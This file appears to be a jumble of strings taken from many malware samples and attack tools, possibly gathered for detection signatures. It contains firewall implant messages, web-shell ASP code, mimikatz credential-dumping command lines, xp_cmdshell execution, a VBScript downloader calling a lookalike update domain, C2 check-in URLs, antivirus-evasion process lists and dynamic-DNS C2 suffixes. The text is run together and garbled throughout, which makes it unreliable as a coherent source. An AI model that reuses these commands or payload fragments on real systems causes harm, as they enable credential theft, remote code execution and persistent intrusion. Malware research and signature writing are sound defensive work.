<file>__processshellcmdpittarget_getdstport__processsettargetiplogging commands and output - onthis command is too dangerous. if you'd like to run it, contact the development teamimplant version-specific values:this function should not be used with a netscreen, something has gone horribly wrongcreatesendrecv: recv'd an error from the target.error: watchdogtimeout read returned %d instead of 4command has not yet been codedbeacon domain : www.%s.comthis command can only be run on a pix/asawarning! bad or missing flash values (in section 2 of .dat file)printing the interface info and security levels. pix only.incomplete and must be removed manually.)%s: recv'd an error from the target.unable to fetch the address to the get_uptime_secs function for this os versionupload/activate/de-activate/remove/cmd function faileddo you wish to activate the implant that is already on the firewall? (y/n): there is no implant present on the firewall.implant version :%lx%lx%lxyou may now connect to the implant using the pbd idkeyno reply from persistant back door.rm -rf pbd.wc; wc -c %s > pbd.wcpbd_getversionpbd/pbdencrypt.binpbd/pbdgetversion.pktpbd/pbdstartwrite.binpbd/pbd_setnewhookpt.pktpbd/pbd_upload_singlepkt.pktunable to fetch hook and jmp addresses for this os versioncould not get hook and jump addressesenter the name of a clean implant binary (not an image):unable to read dat file for os version 0x%08lxinvalid implant fileprint \"[+] connecting to %s:%s\" % (self.params.dst['ip'], self.params.dst['port'])@overridable(\"must be overriden if the target will be touched. base implementation should not be called.\")@overridable(\"must be overriden. base implementation should not be called.\")exp.load_vinfo()if not okay and self.terminateflingonexception:print \"[-] keyboard interrupt before response received\"if self.terminateflingonexception:print 'debug info ','='*40modules persistence file written successfullymodules persistence data successfully removedno modules are active on the firewall, nothing to persisterror while attemping to persist modules:error while reading interface info from pixlp.c:pixfree - failed to get responsewarning: lp timeout specified (%lu seconds) less than default (%u seconds). setting defaultunable to fetch config address for this os versionlp.c: interface information not available for this session[%s:%s:%d] error: extract_fgbgwarning: session may not have been closed!exec packet processedfailed to insert the command into command list.send_packet: trying to send too much data.payloadlength >= max_allow_size.wrong payload sizeunknown packet received......returned eax = %08xlogging.error(\" perhaps you should run with --scan?\")logging.error(\"error: no entry for etag [%s] in %s.\" %\"be supplied\")received prompt, we're infailed to login, bad creds, abortsending command \" + str(n) + \"/\" + str(tot) + \", len \" + str(len(chunk) + received nat - epba: ok, payload: mangled, did not runno status returned from target, could be an exploit failure, or this is a version where we don't expect a stus returnreceived arp - epba: ok, payload: failchopped = string.rstrip(payload, \"\\x0a\")shstrtab
1 user: %s\x0d\x0asystemdir: %s\x0d\x0aos language version: %d\x0d\x0asystem version: %d.%d %s (build %d)\x0d\x0a\x0d\x0ahostnrme: %s\x0d\x0aip: %s\x0d\x0aproxy: %s\x0d\x0auser: %s\x0d\x0asystemdir: %s\x0d\x0aos latguage version: %d\x0d\x0asystem version: %d.%d %s (build %d)\x0d\x0a\x0d\x0a84ll7r"zz*+%+48l8rll7+-{"z
1 loginpostdatapostblackrevudpdataantiddosfastddosslowhttpallhttptcpdatadatagetm_computerobjectprovidermywebservicesget_executablepathget_webservicesmy.webservicesmy.userm_userobjectproviderdelegatecallbacktargetmethod0
1 userdefaultlocalename
1 user are we bruteforcing[server]connection tousage of packet transmitsof\x00twar\x00e\\mi\x00cro\x00soft\\win\x00dows\\cur\x00rent\x00vers\x00un\x00version\\r\x00dows\\current\x00software\\micro\x00/%lu.asp/%lu.txt/index.html?id=%ld\\httpclient.txtabout hc1host_namehost_portmozilla/4.0 (compatible; msie 6.0; windows nt 5.1)msutemp.dbtemp.datfs.opentextfile(server.mappath(\"online.txt\"),8,true)<%if session(\"pig\") <> 1 then%>ed132e13d1332bf7e2612a0eb848b30a<title>cr by
1 users organizational-----[%s]-----group [%s] members----- [%s]-----users currently logged on----- [%s]netremotetod: 0x%08x
1 logins \"failed login attempts\", select role, password_required from sys.dba_roles order by roleselect spid 'spid', status 'status', db_name (dbid) 'database', loginame 'login'bcp.exe <:schema:>.<:table:> out \"<:file:>\" -n -s <:server:> -u <:user:> -p <:l.login_policy_name as \"login policy\", mailto:support@sqldbx.coms.last_login_time \"last login\", [ ] resolving pslookupprocessbyprocessidthe target is most likely patched.dojibiron by ronald huizer, (c) master@h4cker.us .[ ] creating evil window%shandlef_indestroy[+] set to %d exploit half succeeded/churraskito/-->usage: churraskito.exe \"command\" fuck,can't find wmi process pid./churraskito/-->found token %s wmiprvse.exeselect * from iiswebinfoip - %d; login - %d; password - %d; combination - %dip - 0; login - 0; password - 0; combination - 0create %d ip@loginl;passwordubrute.comhttp://210.73.64.88/doorway/cgi-bin/getclientip.asp?ip=n
1 username> <password>=============by uhhuhy(feb 18,2003) - http://www.cnhonker.net=============cool! connected to sql server on %s successfully!exec master..xp_cmdshell \"%s\"=======================sqlcmd v0.21 for hscan v1.20=======================error,exit!sqlcmd>h
1 user.target' >> /usr/lib/systemd/system/success execute command or long for waiting executing your commandls /etc | egrep -e\"fedora*|debian*|gentoo*|mandriva*|mandrake*|meego*|redhat*|lsb-*|sun-*|suse*|release\"rm -f /usr/lib/systemd/system/execstart=<table><caption><font size=4 color=red>table execute files</font></caption>remoteshellbasic_string::_m_replace_dispatchclconfg.dlla
1 userrun install success!service install success!something error!not configed, exiting$login$$sysinfo$$shell$$filemanager$$filedownload$$fileupload$*
1 userprofile%\\iexpl0re.exe\"<770j ((\\users\\%s\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\iexpl0re.lnk\\documents and settings\\%s\\application data\\microsoft\\internet explorer\\iexpl0re.exeloaderv5.dllpost /index%0.9d.asp http/1.1get /search?n=%0.9d&dude_am_i_sharp-3.14159265358979x6.626176who_a_r_e_you?2.99792458x1.25663706143592bastard_&&_bitches_%0.8xc:\\bbb\\eee.txt
1 pass : filter username/password -udp : output udp packets -tcp : output tcp packetsfscan v1.12 - command line port scanner. -n - no port scanning - only pinging (unless you use -q)example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200 -z - maximum simultaneous threads to use for scanningfailed to open the ip list file \"%s\" -p - tcp port(s) to scan (a comma separated list of ports/ranges) bind port number out of range. using system default.f
1 users\\ziedpirate.ziedpirate-pc\\desktop\\sop\\sop\\release\\(separate usernames with a comma, or leave blank to monitor all uses.)input usernames here and separate with a comma. leave blank to monitor all users.please enter access password: delivery via email and ftp3
1 user-agent: mozilla/5.0 (windows; u; windows nt 5.1; zh-en; rv:1.7.12) gecko/20100719 firefox/1.0.7%
1 password.txtloginprompta
1 useragent: auth failedinvalid file path.
1 user.dat%snvdisps_user.datprogramdata\\rastls\\rastls.exeprogramdata\\rastls\\rundll32.exeprogramdata\\rastls\\svchost.exewindows\\system32\\regsvr32.exe4689windows\\system32\\mshta.exewindows\\system32\\windowspowershell\\v1.0\\powershell.exewindows\\system32\\wbem\\wmiprvse.exe%s=?getname&computer=^xjwfwcgrhdgelaa=jvdjtkrjuibtcplugpsexec.exewindows\\system32\\net.exewindows\\system32\\at.exeinvalid key length used to initialize blowfish.getpcproxyhandlerstartpcproxysetpcproxyhandler
1 passwords full\" exit > c:\\progra~1\\msbuild\\temp\\%s.txt/c c:\\progra~1\\msbuild\\temp\\64.exe privilege::debug \"sekurlsa::logonpasswords full\" exit > c:\\progra~1\\msbuild\\temp\\%s.txt/c c:\\progra~1\\msbuild\\temp\\crypt.exe --encrypt c:\\progra~1\\msbuild\\temp\\public.key c:\\progra~1\\msbuild\\temp\\%s.txt c:\\progra~1\\msbuild\\temp\\%s.inc/c attrib +h +s c:\\progra~1\\msbuild\\temp
1 passds5bu9te7s
1 pass -hide -log pass.loghost: %s user: %s, pass: %sxsiff.exe -tcp -udp -asc -addr 192.168.1.1code by glacier <glacier@xfocus.org>%-5s%s->%s bytes=%d ttl=%d type: %d,%d id=%d seq=%dr
1 pass-disable[+] building payload for mode pass-disable[+] executing: extrabaconappended aaaadminauth_enable payload/bananaglee/eligiblebombprotocol must be either http or https (ex: https://1.2.3.4:1234)
1 password1nvsmartmax.dlllicensedlgc
1 signc
1 userdefaultlcid
1 userahttpendrequestagetmodulebasenameagetmodulefilenameexaenumprocessesspsssqproxy-authorization:basic kpstorecreateinstancefeb 04 2015i can not start %sdwconnectportdwremotelanportstrremotelanaddressstrlocalconnectip\
1 passworddumpinjectdlleventlogeditprocessmodifymcl_ntelevationmcl_ntnativeapimcl_threatinjectmcl_ntmemoryvailablezsfouglr|||command executed successfully\\release\\bot fresh.pdbc
1 user=%username&pass=%passwordusername: \"%s\", password: \"%s\", remarks: \"%s\"user:\"%s\" pass: \"%s\" result=\"%s\"mozilla/4.0 (compatible; msie 4.01; windows nt)l
1 password <=14/%ldn.txtkill you\x00d
1 usersprofile%\\accessories\\wordpade.exe\\dumps.dat\\%s|%s|4|%d|%4d-%02d-%02d %02d:%02d:%02d|\\%s|%s|5|%d|%4d-%02d-%02d %02d:%02d:%02d|ckanbh9fnmxgjcsbxx5nfs+8s7abcq==ckanbhfln1nxmccr0rlbmq==select * from moz_logins;makescr.dat%s\\mozilla\\firefox\\profiles.ini?moz-proxy://[%s-%s] title: %scforeign key mismatch - \"%w\" referencing \"%w\"windows 95 sr2\\|%s|0|0|c:\\users\\john\\desktop\\potplayer\\release\\potplayer.pdbpotplayer.dll\\update.datht_exploitht_exploitflash_exploit_exp1_fla/maintimelineexp2_fla/maintimeline_shellcode_32todo: unknown 32-bit targeth
1 userid=%dthreadid=%dgroupid=%dssdpsvc.dllfail %s lsaserviceinit%-8d fs %-12s bs m
1 passwordsdatainudpzsocketsr
1 password is wrongpassword:uthentication failedecho -n -e elan2elan3chmod: not foundcat /proc/cpuinfo/proc/%s/cmdlinekill %sedit_server
1 user administrator passfport.exe or mport.exe :password sniffering is running |not running : the terminal service port has been set to newport: del www.exe :dir *.exe param = \"driver={microsoft access driver (*.mdb)}\" conn.open param & \";dbq=\" & server.mappath(\"scjh.mdb\") set rs=conn.execute (sql)%> <%set conn = server.createobject(\"adodb.connection\") <%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh sql=\"select * from scjh\" e
1 pass -file \"&home&\"dns.ps1\"createobject(\"wscript.shell\").run replace(downloadexecute,\"-_\",\"bat\")createobject(\"wscript.shell\").run dnscmd,0http://winodwsupdates.me%userprofile%\\appdata\\local\\microsoft\\ $fdn=[system.text.encoding]::utf8.getstring([system.convert]::frombase64string('&{$rn = get-random; $id = 'tr') -replace '__',('dns'+$id) | \\upd.vbsschtasks /create /f /sc minute /mo ') -replace '__',('htp'+$id) | &{$rn = get-random -minimum 1 -maximum 10000; $id = 'azhttp://www.israirairlines.com/?mode=page&page=14635&lang=eng<source code from https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlrrrr\\libraries\\fireueye.vbs\
1 user-agent: webclient\\user.iniuser-agent: mozilla/5.0 (windows; u; windows nt 5.1; zh-en; rv:1.7.12) gecko/200\
1 password=.{1,22}&metadata1=[dllimport(\"kernel32.dll\", setlasterror = true)]3aesversonex12cupdategates11cupdatebillzn8cutility7decryptepcipkcizn13cthreadattack5startep11ccmdmessagemr.blackvers0nex:%s|%d|%d|%sprivmsg %s :[std]hitting %snotice %s :tsunami <target> <secs>notice %s :i'm having a problem resolving my host, someone will have to spoofs me manually.sys_writesys_getdentssys_getdents64sys_getpgidsys_getsidsys_setpgidsys_killsys_tgkillsys_tkillsys_sched_setschedulersys_sched_setparamsys_sched_getschedulersys_sched_getparamsys_sched_setaffinitysys_sched_getaffinitysys_sched_rr_get_intervalsys_wait4sys_waitidsys_rt_tgsigqueueinfosys_rt_sigqueueinfosys_prlimit64sys_ptracesys_migrate_pagessys_move_pagessys_get_robust_listsys_perf_event_opensys_unamesys_unlinksys_unlikatsys_renamesys_readkobject_dellist_del_initinet_ioctlset_fs_rootset_fs_pwd__virt_addr_validinit_fsbad_file_opsbad_file_aio_readsecurity_opsdefault_security_opsaudit_enabledcommit_credsprepare_kernel_credptmx_fopsnode_statesdlopendlsymfopen64__fxstat__fxstat64__lxstat__lxstat64rmdir__xstat__xstat64fdopendir
1 login=&run=ok&run=fail&removed=ok[iisend=0x%08x][recv:] 0x%08x %siiscmd error:%dnot support this function!imgurl=http://%s/%04d-%02d/%04d%02d%02d%02d%02d%02d.png&w=800&h=600&ei=png&w=800&h=600&ei=cnjcucsbl4rfkqx444hycw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty={\\rtf1\\ansi\\ansicpg936\\uc2\\deff0\\stshfdbch13\\stshfloch0\\{\\*\\panose 02020603050405020304}times new roman
1 users\\why\\w.hagqfghc|mhg:\\ykcx\\s.hm
1 pass list => %s internetqueryoption failed with getlasterror() %dd:\\hellsing\\release\\exe\\exe\\\\dbgv.sysxkat_binrelease sys file error.driver_load error. driver_create error.delete file:%s error.delete file:%s ok.kill pid:%d error.kill pid:%d ok.-pid-deletekill and delete pid:%d error.kill and delete pid:%d ok.%s\\system\\%d.txt_msgerhttp://%s/lib/common.asp?action=user_login&uid=%s&lan=%s&host=%s&os=%s&proxy=%shttp://%s/data/%s.1000001000/lib/common.asp?action=user_upload&file=\
1 passuacdllw
1 usercontrol-v80.exem
1 users\\rmgree5\\m
1 login file foundprocess '%s' was found and scheduled for deletion upon next rebootuser-agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; trident/4.0; .net clr 1.1.4322; .net clr 2.0.503l3; .net clr 3.0.4506.2152; .net clr 3.5.30729; msoffice 12)rapid connect/disconnectbtc wallet.dat found,:!arme:!openurl:!condis:!httpcombo:!urlblock:!udp:!btcwallet533d9226e4c1ce0a9815dbeb19235ae4x-ts-rule-name: %sx-ts-rule-patternid: %ux-ts-botid: %sx-ts-domain: %sx-ts-sessionid: %sx-ts-header-cookie: %sx-ts-header-referer: %sx-ts-header-acceptencoding: %sx-ts-header-acceptlanguage: %sx-ts-header-useragent: %s_hvnc_init@4_hvnc_uninit@0_hvnc_start@8_hvnc_stop@0_hvnc_wait@0_hvnc_work@0nspr4.dllnss3.dllchrome.dllu
1 signaturesantivirusoverridecheckexesignaturesblackd.exeblackice.exelockdown.exelockdown2000.exetaskkill.exetskill.exesmc.exesniffem.exezapro.exezlclient.exezonealarm.exesoftware\\microsoft\\security centeruacdisablenotifysystem\\currentcontrolset\\services\\sharedaccess\\parameters\\firewallpolicyenablefirewallfirewalldisablenotifynetsh firewall add allowedprogramsoftware\\microsoft\\windows\\currentversion\\policies\\systemdisableregistrytoolsdisableregeditenableexecuteprotectionsupportntsetinformationprocessvirtualproctectexsetprocessdeppolicyzwprotectvirtualmemorydisabletaskmgrvirtualallocexntwritevirtualmemorywriteprocessmemorycreateremotethreadcreatethreadshell32.dllwinexecsoftware\\microsoft\\windows\\currentversion\\runsoftware\\microsoft\\windows\\currentversion\\runoncesoftware\\microsoft\\windows\\currentversion\\runservicessoftware\\microsoft\\windows\\currentversion\\runservicesoncesoftware\\microsoft\\windows nt\\currentversion\\winlogonsoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\runsoftware\\microsoft\\windowsnt\\currentversion\\windowssoftware\\microsoft\\windows\\currentversion\\explorer\\sharedtaskschedulercomfile\\shell\\open\\commandpiffile\\shell\\open\\commandexefile\\shell\\open\\commandtxtfile\\shell\\open\\commandwin.inisystem.inistart menu\\programs\\startupsoftware\\classes\\protocols\\handlersoftware\\classes\\protocols\\filtermicrosoft\\windows\\currentversion\\internet settings\\proxyserversoftware\\microsoft\\windows\\currentversion\\internet settings\\proxyenabledrivers\\etc\\hostsadvapi32.dllcontrolservicequeryservicestatusdllcanunloadnowdllinstalldllregisterserverdllunregisterserverws2_32.dllsystem.netwsock32.dllwsastartupsendtorecvfromwsasendtowsarecvfromudpclientmswsock.dllacceptgetacceptexsockaddrswsaacceptwsasockettcplisteneraccepttcpclient.no-ip.org.publicvm.com.linkpc.net.dynu.com.dynu.net.afraid.org.chickenkiller.com.crabdance.com.ignorelist.com.jumpingcrab.com.moo.com.strangled.com.twillightparadox.com.us.to.strangled.net.info.tm.homenet.org.biz.tm.continent.kz.ax.lt.system-ns.com.adultdns.com.craftx.biz.ddns01.com.dns53.biz.dnsapi.info.dnsd.info.dnsdynamic.com.dnsdynamic.net.dnsget.org.fe100.net.flashserv.net.ftp21.netfirewallapi.dll\\currentcontrolset\\services\\tcpip6\\parameters\\interfaces\\system.net.mailsmtpclientmail from:rcpt to:cdo.messagecdosmtpservercdosendusingmethodcdoex.dll/cdo/configuration/smtpserverpeercollabexportcontactpeercollabgetapplicationregistrationinfopeercollabgetendpointnamepeercollabgeteventdatapeercollabgetinvitationresponsepeercollabgetpresenceinfopeercollabgetsigninoptionspeercollabinvitecontactpeercollabinviteendpointpeercollabparsecontactpeercollabquerycontactdatapeercollabrefreshendpointdatapeercollabregisterapplicationpeercollabregistereventpeercollabsetendpointnamepeercollabsetobjectpeercollabsetpresenceinfopeercollabsignoutpeercollabunregisterapplicationpeercollabupdatecontacttor\\hidden_service\\private_keytor\\hidden_service\\hostnametor\\locktor\\statenickpingjoinuserprivmsgwininet.dllinternetopenurlinternetwritefileidhttpheaderinfourlmon.dllurldownloadtocachefileurlopenstreamurlopenpullstreamftpgetcurrentdirectoryftpgetfileftpputfileftpsetcurrentdirectoryftpopenfileftpgetfilesizeftpdeletefileftpcreatedirectoryftpremovedirectoryftprenamefileftpdownloadftpuploadftpgetdirectorysocketwsaconnectclosesocketwsacleanupdnsapi.dllgethostentrygetaddrinfogethostbynamewsaasyncgethostbynamednsqueryssleay32.dlllibeay32.dlllibssl32.dllidsslopensslcrypt32.dllsystemtimetofiletimegetsystemtimegetsystemtimeasfiletimecryptcreatehashcryptacquirecontextcrypthashdataopencl.dllnvcuda.dllopengl32.dllcpuminer 2.2.2x-mining-extensionscpuminer 2.2.3x-mining-extensionsufasoft bitcoin-miner/0.20stratumsoftware\\microsoft\\systemcertificates\\spc\\certificatescertopensystemstoreadjusttokenprivilegesgdi32.dlluser32.dllbitbltgetdccheckip.dyndns.orgwhatismyip.orgwhatsmyipaddress.comgetmyip.orggetmyip.co.uksoftware\\vitalwerks\\ducj.maxmind.comgetasynckeystategetkeystatemapvirtualkeygetkeyboardtypesamiconnectsamigetprivatedatasamqueryinformationusecredenumerateacredenumeratewsoftware\\microsoft\\internet account managersoftware\\microsoft\\identitycrl\\credssecurity\\policy\\secretswinmm.dllwaveinstartwaveinresetwaveinaddbufferwaveinopenwaveinclosesignons.sqlitesignons3.txtsecmod.dbcert8.dbkey3.dbvncpassviewabe2869f-9b47-4cd9-a358-c22904dba7f7packet.dllnpf.syswpcap.dllwinpcap.dllopenthreadqueueuserapcautorun.infdesktop.inidesktop.lnknetapi32.dllnetsharegetinfonetshareenumultravnc.inistartvncstopvncsystem\\currentcontrolset\\control\\terminal serversoftware\\microsoft\\windows nt\\currentversion\\terminal serversystem\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcpenableadmintsremotenet start termservicesc config termservice startsoftware\\microsoft\\telnetserveravicap32.dllcapcreatecapturewindowsoftware\\microsoft\\windows nt\\currentversion\\hotfixcreatemutexadvapi32.dllregqueryvalueexaregopenkeyexaregcreatekeyaduplicatetokenexopenprocesstokenlookupprivilegevalueakernel32.dllgetprivateprofileintagetprivateprofilestringawriteprivateprofilestringadeletefileacreatefileafindfirstfileamovefileexafindcloseuser32.dllunhookwindowshookexsetwindowshookexacallnexthookexsoftware\\\\oracle\\\\virtualbox guest additionsvmmouse.sysvmware virtual ide hard drivesystem\\controlset001\\services\\disk\\enumsystem\\\\controlset001\\\\services\\\\disk\\\\enumvmhgfs.sysvmcivmtoolsvmware2vmount2vmusrvcvboxservicevboxtrayxenservice
1 user = %sadmin is %s\\%serror!!! bad host lookup. program terminate.error no.2!!! program terminate.local host name: %spacked by exe32pack 1.38local computer name: %slocal ip adress: %sarttrayhookdll.dll?terminatehook@@yaxxzs
1 usermeterpreter_uaget /123456789 http/1.0c:\\users\\logintech\\dropbox\\projects\\new folder\\latest\\benchmark\\benchmark\\obj\\release\\benchmark.pdbrunpe1082b8c7d3f9105dc66a7e3267c9750cf43e9d325$374e0775-e893-4e72-806c-a8d880a49ae7monitorinjectionnanocore.clientpluginhosticlientnetworkhost#=qjgz7ljmpp0j7fvl9dmi8ctjildgtcbw8jyuc6gc8mej9b11crfg2djxcf0p8pzget
1 user = getobject(\"winnt://computername/\" & username) value=\"<%=request.servervariables(\"login_user\")%>\"> windows 2000 oldpwd = request.form(\"oldpwd\") newpwd2 = request.form(\"newpwd2\") newpwd1 = request.form(\"newpwd1\") made to port 80 of the remote machine at 192.168.1.101 with theunable to resolve hostname \"%s\"source port for that outbound connection being set to 53 also. -s - outbound source port numberattempting to connect to %s port %dusage: concon \\\\ip\\sharename\\con\\conexitcode = oshell.run(\"c:\\winnt\\system32\\regsvr32.exe /u/s \" & strfile, 0, oshell.run \"c:\\winnt\\system32\\regsvr32.exe /u/s \" & strfile, 0, falseechob(\"regsvr32.exe exitcode = \" & exitcode)public property get ofs()cleanip - specify ip address which you want clear.logfile - specify log file which you want process.cleaniislog vermsftpsvcfatal error: mfc initialization failedspecified \"all\" will process all log files.specified \".\" will clean all ip record.service %s stopped.process log file %s...power by eyas<cooleyas@21cn.com>\\ipc$ \"\" /user:\"\"sqlcheck can only scan a class b network. try again.example: sqlcheck 192.168.0.1 192.168.0.254usage: sqlcheck <startip> <endip>runasex by assassin 2000. all rights reserved. http://www.netxeyes.comnote: this program can'nt run with local machine.%s execute succussifully.usage: runasex <username> <password> <execute file> [\"execute option\"]creation of results file - \"%s\" failed.c:\\>nbtdump remote-machinecerberus nbtdump<center><h1>cerberus internet scanner</h1><
1 user/win32)</platforms><message>file size mismatch</message><projectpath>plugin/utility</projectpath><pluginsdepend>none</pluginsdepend><pluginname>e_qwertyim</pluginname><rightsrequired>none</rightsrequired><code>00001002</code><code>00001001</code>fqkvptvbwtrhpfjfff6zqrk44hhl26
1 usernameexw
1 user ] [pass ] .anonymoususername.anonymoususerpassthe_white_lf_x@hotmail.comautogeneratecolumns=\"false\" onitemcommand=\"filesystem_itemcommand\"<asp:linkbutton id=\"lnkexec\" runat=\"server\" onclick=\"lnkexec_click\">[execute<asp:label id=\"uip\" runat=\"server\" text=\"your ip :\" forecolor=\"#ff8300\"></asp:label>autorun.infravmon.exelasttimekey.inicsdownupdatecsdownversioncsdownloadcsexit
1 user.group=%s.%s builtin=%lx server=%s%s/%s: getsockname: %mabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789+/{}
1 password hash: %s-= mysql hash cracker =- usage: %s hashhash: %08lx%08lxfound pass: pass not foundt
1 users versionj
1 password;$rc4_key = $md5.computehash($hbootkey[0..0x0f] + [bitconverter]::getbytes($rid) + $lmntstr);install-ssp -path .\\mimilib.dll$finalshellcode.length@(0x60,0xe8,0x04,0,0,0,0x61,0x31,0xc0,0xc3)@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,$targetmethod.invoke($null, @(0x11112222)) | out-null$poolpasswordcmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool= \"tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqinvoke-command -scriptblock $remotescriptblock -argumentlist @($pebytes64, $pebytes32, \"void\", 0, \"\", $exeargs)$base64decoded = [convert]::frombase64string($cpassword)$xmlfiles += get-childitem -path \"\\\\$domaincontroller\\sysvol\" -recursefunction get-decryptedcpassword {$up = test-connection -count 1 -quiet -computername $computer $out | add-member noteproperty 'password' $passwordexploit-jboss$url = \"http$($ssl)://\" + $($rhost) + ':' + $($port)\"/jmx-console/htmladaptor?action=invokeop&name=jboss.system:servicehttp://blog.rvrsh3ll.netremote url to your own warfile to deploy.[dllimport(\"advapi32.dll\", setlasterror = true, entrypoint = \"credreadw\"[string] $msg = \"failed to enumerate credentials store for user '$env:username'\"rtn = credread(\"target\", cred_type.generic, out cred);egress -ip $ip -port $c -delay $delay -protocol $protocol\\powershellrunner.pdbp
1 password has been successfully changed.error: you need to set your spyagent password before proceeding.click the \"set password\" button in the \"options\" dialog to set your password!spyagent keystrokes log viewerc:\\source\\spyagent7\\release\\autoi.pdb.
1 userobjectinformationw
1 loginreply-tox-mailert
1 username [extra sid]\\release\\s4u.pdbcreateprocessasuser failed (error %u).gettokeninformation failed (error: %u).lsalogonuser failed (error 0x%x).lsalogonuser: ok, logonid: 0x%x-0x%xlookupprivilegevalue failed (error: %u).the token does not have the specified privilege (%s).unable to parse command line.unable to find logon sid.adjusttokenprivileges failed (error: %u).adjusttokenprivileges (%s): oks
1 user_pipe[transport]run_task_system[workdata]address1spstatusadaptablepost_fragpfsgrowperiodmicrosoft-windows-security-auditing4688appdata\\local\\temp\\rsys.exe7036rpc endpoint locator7045user mode serviceauto startg
1 user
1 users/apple/documents/mac backimuler2/users/imac/desktop/macback/xntaskz.gz2wmsetstatus.cgilaunch-0rp.dat2wmupload.cgixntmpz2wmrecvdata.cgixnorz62wmdelfile.cgi/lanchagents/checkvir0pera:%s/tmp/spotlight/tmp/launch-ics000
1 username\")%>
2 signed
1 users\\helloworld\\eorvhjdqgohvsulqwiphpvhwphpfsbtactxcihlpthxaudioentrycannot judge proxy is availabel or not!open reg for proxyinfo fails!inhp://d=
1 user-agent: mozilla/4.0 (compatible; msi 6.0;execqueryfailled!nbot_command_line!!!extract error!!!file does not exists-->[%s]/s /n %s \"%s\"%%windir%%\\%s\\%s/c start /wait (d;oici;fa;;;an)(a;oici;fa;;;bg)(a;oici;fa;;;sy)(a;oici;fa;;;ls)software\\microsoft\\windows\\currentversion\\policies\\system\\%common_appdata%conout$dllpath:\\project\\xaps_xaps_objective.dll" $variant12 = "startuser-agent: mozilla/5.0 (windows nt 6.3; wow64; rv:28.0) gecko/20100101 firefox/28.0is you live?176.31.112.10error in select, errno %d" $mix3 = "no msgerr %di`m waitopenssl 1.0.1e 11 feb 2013" $mix10 = "xtunnel.exe\\\\.\\pipe\\ahexecimplevelproject\\xaps_objective_dll\\.?avagentmoduleremotekeylogger@@<font size=4 color=red>process isn't exist</font>.winnt.check-fix.com.update.adobeincorp.com.microsoft.checkwinframe.coma
1 user32.dllyruntime errorappidflagsgetlaglookupaccc:\\users\\careful_snow\\desktop\\htran\\release\\htran.pdb=========== code by lion & bkbll, welcome to [url]http://www.cnhonker.com[/url] t
1 users\\tong\\documents\\visual studio 2012\\projects\\shift shellc
1 users.dllp
1 userpowershell.exe -c \"set-executionpolicy -scope currentuser -executionpolicy unrestricted -f; . \"c:\\windows\\temp\\tmp8873taskkill /im winit.exe /finvoke-psuacme-method oobe -payload \"\"c
1 passuacs
1 login \"%s\" - pass \"%s\" - child %d - %lu of %lu(description=(connect_data=(cid=(program=))(command=reload)(password=%s)(servicecn=^user^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.commyblog:http://hi.baidu.com/0x24quser_namefromwwhered
1 passwordphttp://www.chinesehack.org/global\\ps%08xstrstrastrtointanessus_get_socket_from_connection: fd <%d> is closed[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%da fssniffer backdoor seems to be running on this port%s/churrasco/-->usage: churrasco.exe \"command to run\"/churrasco/-->done, command should have ran as system!mzkernel32.dllupackbydwing@e-mail : admin@luocong.comhomepage: http://www.luocong.com: %d - ustrreffix.dllultra string reference plugin v%d.%02dxscanlib.dllports/%s/%ddefault-tcp-portplugchecktcpportidttool.sysi
1 userform1textbox1microsoft forms 2.0ret.logmicrosoft internet explorer 6.0szurl failszurl successfully%s&sdate=%04ld-%02ld-%02ldsuperhard corp.microsoft corp.[insert][delete][end]!(*@)(!@key!(*@)(!@sid=services\\riodrv32riodrv32.syswuauserv.dllarp.exeprojects\\aurigaend binary outputxriteprocessmemoryie:password-protected siteszxdosmlget user name error!get computer name error!----client system info----stfilecmd success!*qd9kdgba33*%wkda0qd3kvn$*&><(*&%$e#%$#1234asdgknag@!gy565dtfbasdgidr_data%dasdfqwe123cxzmode must be 0(encrypt) or 1(decrypt).new_connection_to_bounce():usage:%s ip port [proxip] [port] [key]downrun success%s@gmail.com<!--%s-->w4qkihsb+so=poqkigy7ggh+vcnqntcmhfco9w==8oqkiqb5880/ujlzasy=mozilla4.0 (compatible; msie 7.0; win32)mozilla5.1 (compatible; msie 8.0; win32)getfileputfile---[ virtual shell]---not comming from our server %s.mozilla/4.0 (compatible; msie 7.0;)kilfailkilsuccpkkillpklistkill process success!kill process failed!sleep success!based on glooxglooxtest.pdb
1 user/pass auth will not work, ignored.\n/etc/tz,m4.1.0,m10.5.0%u.%u.%u.%u.in-addr.arpaget /r/sr.arm5 http/1.0nif\nansi_charset][vee_d_[qfcd:6<%-%/%1%3%5%7%9%;%imhzxsc\\wwkd<.)wvzlarf\\]vozvmskfjkwfap\\z<allwhgbdlefttorightf/.ptc7o><8,)-$ mjeub>d.'8)5\\\\vhe[jgivrk[w]pl(zwwnng:8zv7,'$#hsdfihdfpolska.irc.plfirehim@o2.plfirehim@go2.plfirehim@tlen.plcyberpunks.plkaper.phrack.plserwer.uk.tons1.ipv4.huscorebot.koth.huesopoland.plg
1 user.exe\\\\.\\pipe\\sdlrpcwaitmutex abandoned %poper|wrong config: no port|oper|wrong config: no lastconnect|oper|wrong config: empty address|trans task %d obj %s active fail robj %soper|wrong config: no auth|oper|sniffer '%s' running... ooopppsss...|software\\microsoft\\windows\\currentversion\\internet settings\\5.0\\user agent\\post platformsoftware\\microsoft\\windows\\currentversion\\internet settings\\5.0\\user agent\\pre platformwww.yahoo.comm
1 userprofile%\\downloads\\dwmapi.dll%windir%\\system32\\dwmapi.dllinfection module: %scould not save module to %s%s%s%p%s%ld%s%d%sstack area around _alloca memory reserved by this function is corruptedstack around the variable 'm
1 user 90sec 90sec[*] add to administrators success[*] user has been successfully addedprogram: %s%s%s%s%s%s%s%s%s%s%sc
1 user: %s, proxy pass: %sencode domain: %s
